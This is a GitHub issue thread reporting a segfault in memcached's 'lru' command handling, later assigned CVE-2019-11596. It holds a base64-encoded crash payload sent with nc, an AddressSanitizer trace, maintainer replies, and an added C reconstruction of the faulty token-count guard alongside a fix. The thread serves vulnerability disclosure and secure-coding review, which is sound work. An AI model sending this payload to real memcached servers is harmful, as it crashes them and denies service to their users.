
segfault (null pointer dereference) during lru command handling #474

Closed
stze opened this issue Apr 10, 2019 · 3 comments

@stze

commented Apr 10, 2019

Dear memcached team —

I have detected a SIGSEGV during lru command handling.

Version

bb0980f

How to reproduce

Start memcached:
$ memcached
Send malicious payload via nc:
$ echo -n "bHJ1IG1vZGUKb7G0AGxydWRl6gdtTk9UXw==" | base64 -d | nc 127.0.0.1 11211

ASAN

AddressSanitizer:DEADLYSIGNAL
=================================================================
==14929==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x000000582a7e bp 0x7f6082dfa8d0 sp 0x7f6082dfa780 T4)
==14929==The signal is caused by a READ memory access.
==14929==Hint: address points to the zero page.
    #0 0x582a7d in __wrap_strcmp (/home/stze/Documents/repositories/memcached/memcached+0x582a7d)
    #1 0x547ac4 in process_lru_command /home/stze/Documents/repositories/memcached/memcached.c:4543:13
    #2 0x54055d in process_command /home/stze/Documents/repositories/memcached/memcached.c:4920:9
    #3 0x53b30c in try_read_command /home/stze/Documents/repositories/memcached/memcached.c:5064:9
    #4 0x52a48e in drive_machine /home/stze/Documents/repositories/memcached/memcached.c:5500:17
    #5 0x52c76a in event_handler /home/stze/Documents/repositories/memcached/memcached.c:5782:5
    #6 0x7f6088099030  (/lib64/libevent-2.1.so.6+0x24030)
    #7 0x7f60880997c6 in event_base_loop (/lib64/libevent-2.1.so.6+0x247c6)
    #8 0x56f7ff in worker_libevent /home/stze/Documents/repositories/memcached/thread.c:387:5
    #9 0x7f608805b58d in start_thread (/lib64/libpthread.so.0+0x858d)
    #10 0x7f6087dd9682 in __GI___clone (/lib64/libc.so.6+0xfd682)

Please let me know what additional information I can provide to successfully reproduce the issue.

@dormando


Member

commented Apr 10, 2019

thanks! Looks like I got lazy while writing that handler :(

@dormando


Member

commented Apr 27, 2019

bug was also in lru temp_ttl.
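The first line of the base64 payload in the report decodes to `lru mode` followed by a newline, i.e. the sub-command with its argument missing, and the trace shows `strcmp()` reading address 0 from inside `process_lru_command`. The following C program is an added example, not memcached's code, that reconstructs the pattern behind both the `lru mode` and the `lru temp_ttl` crash. It assumes memcached's tokenizer convention that a terminal token with `value == NULL` is appended and counted in `ntokens`, so `lru mode` tokenizes to three tokens rather than two; under that assumption a guard of `ntokens >= 3` lets the NULL terminator reach `strcmp()`, and requiring one more token (`ntokens >= 4`) is the hardened variant shown here. The guard values, the `LRU_GUARD_*` names and the `"SEGV"` sentinel are this example's own, not the project's patch.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Added example, not memcached's code. token_t mirrors the shape of
 * memcached's token: value points into the command buffer and is NULL on
 * the terminal token (assumption about the real tokenizer's convention). */
typedef struct {
    char *value;
    size_t length;
} token_t;

#define MAX_TOKENS 8

/* Stand-in tokenizer: splits on spaces, NUL-terminates each token in
 * place, then appends a terminal token with value NULL that IS counted in
 * the returned ntokens. "lru mode" therefore yields ntokens == 3. */
static size_t tokenize_command(char *command, token_t *tokens, size_t max_tokens) {
    size_t ntokens = 0;
    char *s = command;
    char *e = command;

    while (ntokens < max_tokens - 1) {
        if (*e == ' ' || *e == '\0') {
            int at_end = (*e == '\0');
            if (e > s) {
                *e = '\0';
                tokens[ntokens].value = s;
                tokens[ntokens].length = (size_t)(e - s);
                ntokens++;
            }
            if (at_end) break;
            s = e + 1;
        }
        e++;
    }
    tokens[ntokens].value = NULL;
    tokens[ntokens].length = 0;
    return ntokens + 1;
}

typedef enum { LRU_GUARD_BUGGY, LRU_GUARD_FIXED } lru_guard;

/* Reconstructed handler. With the buggy guard, ntokens >= 3 only proves
 * that tokens[1] ("mode" / "temp_ttl") is real; tokens[2] may be the NULL
 * terminator, which the original code passed straight to strcmp(). Rather
 * than crash, this version returns "SEGV" at the point where the NULL
 * dereference would happen; the fixed guard never reaches it. */
static const char *process_lru_command(char *line, lru_guard guard) {
    token_t tokens[MAX_TOKENS];
    size_t ntokens;
    size_t need = (guard == LRU_GUARD_FIXED) ? 4 : 3;
    size_t n = strlen(line);

    /* strip the trailing line ending before tokenizing */
    while (n > 0 && (line[n - 1] == '\n' || line[n - 1] == '\r'))
        line[--n] = '\0';

    ntokens = tokenize_command(line, tokens, MAX_TOKENS);
    /* "lru" + sub-command + terminator is the minimum to look at tokens[1] */
    if (ntokens < 3 || strcmp(tokens[0].value, "lru") != 0)
        return "ERROR";

    if (strcmp(tokens[1].value, "mode") == 0 && ntokens >= need) {
        if (tokens[2].value == NULL)
            return "SEGV";   /* buggy guard: strcmp(NULL, "flat") */
        if (strcmp(tokens[2].value, "flat") == 0 ||
            strcmp(tokens[2].value, "segmented") == 0)
            return "OK";
        return "ERROR";
    } else if (strcmp(tokens[1].value, "temp_ttl") == 0 && ntokens >= need) {
        char *end;
        long ttl;
        if (tokens[2].value == NULL)
            return "SEGV";   /* same off-by-one, as noted for temp_ttl */
        ttl = strtol(tokens[2].value, &end, 10);
        if (*end != '\0' || ttl < 0)
            return "ERROR";
        return "OK";
    }
    return "ERROR";
}

/* Copies the command first: the handler rewrites its buffer in place. */
static const char *run_lru(const char *cmd, lru_guard guard) {
    char buf[256];
    snprintf(buf, sizeof buf, "%s", cmd);
    return process_lru_command(buf, guard);
}

int main(void) {
    /* Constructed inputs; "lru mode\n" is the first line of the payload above. */
    const char *cmds[] = { "lru mode\n", "lru temp_ttl\n", "lru mode flat\n",
                           "lru temp_ttl 61\n", "lru\n" };
    size_t i;
    for (i = 0; i < sizeof cmds / sizeof cmds[0]; i++)
        printf("%-18s buggy=%-5s fixed=%s\n", cmds[i],
               run_lru(cmds[i], LRU_GUARD_BUGGY), run_lru(cmds[i], LRU_GUARD_FIXED));
    return 0;
}
```

The point to carry into review of any tokenizer-driven command handler: when the token count includes a sentinel, every `ntokens >= k` guard must be written against the index of the last token the branch actually reads plus two, not plus one; the explicit `tokens[2].value == NULL` checks in the example are the belt-and-braces form that survives a miscounted guard.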

@carnil



commented May 5, 2019

CVE-2019-11596 was assigned for this issue.
